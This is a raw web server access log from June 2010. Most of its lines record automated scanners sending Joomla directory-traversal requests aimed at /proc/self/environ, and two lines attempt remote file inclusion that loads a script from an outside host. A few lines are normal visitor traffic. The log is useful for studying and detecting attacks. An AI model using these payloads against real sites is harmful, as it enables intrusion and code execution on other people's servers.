67.15.152.183 - - [09/Jun/2010:23:45:52 -0500] "GET /index.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.65"
67.15.152.183 - - [09/Jun/2010:23:45:54 -0500] "GET /logs/index.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.65"
67.15.152.183 - - [09/Jun/2010:23:45:54 -0500] "GET /index.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.65"
83.170.108.207 - - [09/Jun/2010:23:46:18 -0500] "GET /logs/access_log.1274832000/index.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.834"
83.170.108.207 - - [09/Jun/2010:23:46:18 -0500] "GET /index.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.834"
83.170.108.207 - - [09/Jun/2010:23:46:18 -0500] "GET /logs/index.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.834"
174.89.32.123 - - [09/Jun/2010:23:46:36 -0500] "GET /tattoo/tatsymbl.htm HTTP/1.1" 200 3085 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6.5; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
87.253.162.10 - - [09/Jun/2010:23:46:41 -0500] "GET /logs/access_log.1273363200/?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-""libwww-perl/5.805"
87.253.162.10 - - [09/Jun/2010:23:46:41 -0500] "GET /?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.805"
87.253.162.10 - - [09/Jun/2010:23:46:41 -0500] "GET /logs/?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 8947 "-""libwww-perl/5.805"
83.170.108.207 - - [09/Jun/2010:23:46:51 -0500] "GET /logs/access_log.1274572800/index.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.834"
174.89.32.123 - - [09/Jun/2010:23:46:55 -0500] "GET /tattoo/tattoo1.htm HTTP/1.1" 304 - "http://en.wikipedia.org/wiki/Tattoo_flash""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6.5; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
174.89.32.123 - - [09/Jun/2010:23:46:55 -0500] "GET /tattoo/tat_1st.JPG HTTP/1.1" 304 - "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6.5; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
83.170.108.207 - - [09/Jun/2010:23:46:56 -0500] "GET /logs/access_log.1274832000/index.php?option=com_abbrev&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.834"
83.170.108.207 - - [09/Jun/2010:23:46:56 -0500] "GET /index.php?option=com_abbrev&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.834"
83.170.108.207 - - [09/Jun/2010:23:46:57 -0500] "GET /logs/index.php?option=com_abbrev&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.834"
83.170.108.207 - - [09/Jun/2010:23:47:19 -0500] "GET /logs/access_log.1273363200/?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-""libwww-perl/5.834"
83.170.108.207 - - [09/Jun/2010:23:47:19 -0500] "GET /?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.834"
83.170.108.207 - - [09/Jun/2010:23:47:19 -0500] "GET /logs/?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 8947 "-""libwww-perl/5.834"
87.253.162.10 - - [09/Jun/2010:23:47:20 -0500] "GET /logs/access_log.1274832000/index.php?option=com_abbrev&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.805"
87.253.162.10 - - [09/Jun/2010:23:47:20 -0500] "GET /index.php?option=com_abbrev&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
87.253.162.10 - - [09/Jun/2010:23:47:20 -0500] "GET /logs/index.php?option=com_abbrev&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
87.253.162.10 - - [09/Jun/2010:23:47:42 -0500] "GET /logs/access_log.1274832000/index.php?option=com_abbrev&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.805"
87.253.162.10 - - [09/Jun/2010:23:47:43 -0500] "GET /index.php?option=com_abbrev&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
87.253.162.10 - - [09/Jun/2010:23:47:43 -0500] "GET /logs/index.php?option=com_abbrev&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
195.64.165.104 - - [09/Jun/2010:23:47:47 -0500] "GET /logs//index.php?option=com_spsnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
195.64.165.104 - - [09/Jun/2010:23:47:48 -0500] "GET //index.php?option=com_spsnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
87.253.162.10 - - [09/Jun/2010:23:47:49 -0500] "GET /logs/access_log.1274832000/index.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.805"
87.253.162.10 - - [09/Jun/2010:23:47:49 -0500] "GET /index.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
87.253.162.10 - - [09/Jun/2010:23:47:50 -0500] "GET /logs/index.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
74.200.76.150 - - [09/Jun/2010:23:47:53 -0500] "GET /logs/access_log.1274832000/index.php?option=com_abbrev&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.831"
74.200.76.150 - - [09/Jun/2010:23:47:54 -0500] "GET /index.php?option=com_abbrev&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.831"
74.200.76.150 - - [09/Jun/2010:23:47:54 -0500] "GET /logs/index.php?option=com_abbrev&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.831"
83.170.108.207 - - [09/Jun/2010:23:47:54 -0500] "GET /logs/access_log.1273363200/?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-""libwww-perl/5.834"
83.170.108.207 - - [09/Jun/2010:23:47:55 -0500] "GET /?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.834"
83.170.108.207 - - [09/Jun/2010:23:47:55 -0500] "GET /logs/?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 8947 "-""libwww-perl/5.834"
81.93.240.122 - - [09/Jun/2010:23:47:56 -0500] "GET /logs/access_log.1274832000/index.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.805"
81.93.240.122 - - [09/Jun/2010:23:47:56 -0500] "GET /index.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
81.93.240.122 - - [09/Jun/2010:23:47:56 -0500] "GET /logs/index.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
87.253.162.10 - - [09/Jun/2010:23:47:59 -0500] "GET /logs/access_log.1274832000/index.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.805"
87.253.162.10 - - [09/Jun/2010:23:47:59 -0500] "GET /index.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
87.253.162.10 - - [09/Jun/2010:23:48:02 -0500] "GET /logs/access_log.1274572800/index.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.805"
87.253.162.10 - - [09/Jun/2010:23:48:03 -0500] "GET /logs/index.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
81.93.240.122 - - [09/Jun/2010:23:48:13 -0500] "GET /logs/access_log.1274572800/index.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.805"
87.253.162.10 - - [09/Jun/2010:23:48:16 -0500] "GET /logs/access_log.1274572800/index.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.805"
114.200.199.236 - - [09/Jun/2010:23:48:52 -0500] "GET /logs/access_log.1271548800//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.kangnung.org//zb//s1.txt? HTTP/1.1" 404 321 "-""Mozilla/5.0"
114.200.199.236 - - [09/Jun/2010:23:48:55 -0500] "GET /logs/access_log.1271548800//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.kangnung.org//zb//s1.txt? HTTP/1.1" 404 321 "-""Mozilla/5.0"
87.253.162.10 - - [09/Jun/2010:23:49:45 -0500] "GET /logs/access_log.1273363200/?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-""libwww-perl/5.805"
87.253.162.10 - - [09/Jun/2010:23:49:46 -0500] "GET /?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.805"
87.253.162.10 - - [09/Jun/2010:23:49:46 -0500] "GET /logs/?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 8947 "-""libwww-perl/5.805"
87.253.162.10 - - [09/Jun/2010:23:49:47 -0500] "GET /logs/access_log.1273363200/?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-""libwww-perl/5.805"
87.253.162.10 - - [09/Jun/2010:23:49:47 -0500] "GET /?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.805"
87.253.162.10 - - [09/Jun/2010:23:49:48 -0500] "GET /logs/?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 8947 "-""libwww-perl/5.805"
67.15.152.183 - - [09/Jun/2010:23:49:52 -0500] "GET /logs/access_log.1274832000/index.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.65"
67.15.152.183 - - [09/Jun/2010:23:49:52 -0500] "GET /index.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.65"
67.15.152.183 - - [09/Jun/2010:23:49:52 -0500] "GET /logs/index.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.65"
67.15.152.183 - - [09/Jun/2010:23:50:08 -0500] "GET /logs/access_log.1274572800/index.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.65"
218.150.85.170 - - [09/Jun/2010:23:50:16 -0500] "GET /logs/access_log.1273017600//index2.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 322 "-""libwww-perl/5.825"
91.203.68.45 - - [09/Jun/2010:23:50:46 -0500] "GET /logs/access_log.1273363200/?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-""libwww-perl/5.810"
91.203.68.45 - - [09/Jun/2010:23:50:46 -0500] "GET /?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.810"
91.203.68.45 - - [09/Jun/2010:23:50:46 -0500] "GET /logs/?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 8947 "-""libwww-perl/5.810"
87.253.162.10 - - [09/Jun/2010:23:50:57 -0500] "GET /logs/access_log.1273363200/?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-""libwww-perl/5.805"
87.253.162.10 - - [09/Jun/2010:23:50:57 -0500] "GET /?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.805"
87.253.162.10 - - [09/Jun/2010:23:50:58 -0500] "GET /logs/?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 8947 "-""libwww-perl/5.805"
83.170.108.207 - - [09/Jun/2010:23:51:15 -0500] "GET /logs/access_log.1274572800/?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-""libwww-perl/5.834"
74.200.76.150 - - [09/Jun/2010:23:51:43 -0500] "GET /index.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.831"
74.200.76.150 - - [09/Jun/2010:23:51:48 -0500] "GET /logs/index.php?option=com_otzivi&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.831"
74.200.76.150 - - [09/Jun/2010:23:51:48 -0500] "GET /index.php?option=com_otzivi&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.831"
74.55.65.134 - - [09/Jun/2010:23:52:09 -0500] "GET ////index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-""libwww-perl/5.831"
74.55.65.134 - - [09/Jun/2010:23:52:11 -0500] "GET ////index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-""libwww-perl/5.831"
74.200.76.150 - - [09/Jun/2010:23:52:12 -0500] "GET /logs/index.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.831"
74.200.76.150 - - [09/Jun/2010:23:52:12 -0500] "GET /index.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.831"
87.253.162.10 - - [09/Jun/2010:23:52:29 -0500] "GET //index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
87.253.162.10 - - [09/Jun/2010:23:52:29 -0500] "GET //index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
83.170.108.207 - - [09/Jun/2010:23:53:02 -0500] "GET /logs/access_log.1273017600/?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-""libwww-perl/5.834"
67.15.152.183 - - [09/Jun/2010:23:53:17 -0500] "GET /logs/access_log.1274832000/index.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.65"
67.15.152.183 - - [09/Jun/2010:23:53:17 -0500] "GET /index.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.65"
67.15.152.183 - - [09/Jun/2010:23:53:17 -0500] "GET /logs/index.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.65"
74.200.76.150 - - [09/Jun/2010:23:53:23 -0500] "GET /logs/access_log.1274832000/index.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.831"
74.200.76.150 - - [09/Jun/2010:23:53:26 -0500] "GET /index.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.831"
74.200.76.150 - - [09/Jun/2010:23:53:27 -0500] "GET /logs/index.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.831"
74.200.76.150 - - [09/Jun/2010:23:53:42 -0500] "GET /logs/access_log.1274572800/index.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.831"
67.15.152.183 - - [09/Jun/2010:23:53:45 -0500] "GET /logs/access_log.1274572800/index.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.65"
211.203.180.144 - - [09/Jun/2010:23:53:58 -0500] "GET //index.php?option=com_foobla_suggestions&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.79"
74.200.76.150 - - [09/Jun/2010:23:54:03 -0500] "GET /logs/access_log.1274832000/index.php?option=com_abbrev&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.831"
74.200.76.150 - - [09/Jun/2010:23:54:03 -0500] "GET /index.php?option=com_abbrev&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.831"
74.200.76.150 - - [09/Jun/2010:23:54:03 -0500] "GET /logs/index.php?option=com_abbrev&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.831"
74.55.65.134 - - [09/Jun/2010:23:54:19 -0500] "GET /logs/access_log.1274572800////index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 323 "-""libwww-perl/5.831"
74.55.65.134 - - [09/Jun/2010:23:54:19 -0500] "GET ////index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-""libwww-perl/5.831"
74.55.65.134 - - [09/Jun/2010:23:54:22 -0500] "GET /logs////index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-""libwww-perl/5.831"
74.55.65.134 - - [09/Jun/2010:23:54:54 -0500] "GET /logs/access_log.1274572800////index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 323 "-""libwww-perl/5.831"
74.55.65.134 - - [09/Jun/2010:23:54:54 -0500] "GET ////index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-""libwww-perl/5.831"
74.55.65.134 - - [09/Jun/2010:23:54:55 -0500] "GET /logs////index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-""libwww-perl/5.831"
91.203.68.45 - - [09/Jun/2010:23:55:13 -0500] "GET /logs/access_log.1273363200/?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-""libwww-perl/5.810"
91.203.68.45 - - [09/Jun/2010:23:55:13 -0500] "GET /?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.810"
91.203.68.45 - - [09/Jun/2010:23:55:13 -0500] "GET /logs/?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 8947 "-""libwww-perl/5.810"
87.253.162.10 - - [09/Jun/2010:23:55:26 -0500] "GET /logs/access_log.1274572800/?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-""libwww-perl/5.805"
87.253.162.10 - - [09/Jun/2010:23:55:51 -0500] "GET /logs/access_log.1274572800/?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-""libwww-perl/5.805"
211.203.180.144 - - [09/Jun/2010:23:56:25 -0500] "GET /logs/access_log.1274832000//index.php?option=com_foobla_suggestions&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.79"
211.203.180.144 - - [09/Jun/2010:23:56:26 -0500] "GET //index.php?option=com_foobla_suggestions&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.79"
211.203.180.144 - - [09/Jun/2010:23:56:26 -0500] "GET /logs//index.php?option=com_foobla_suggestions&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.79"
83.170.108.207 - - [09/Jun/2010:23:56:39 -0500] "GET /logs//index.php?option=com_joomlaflashfun&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.834"
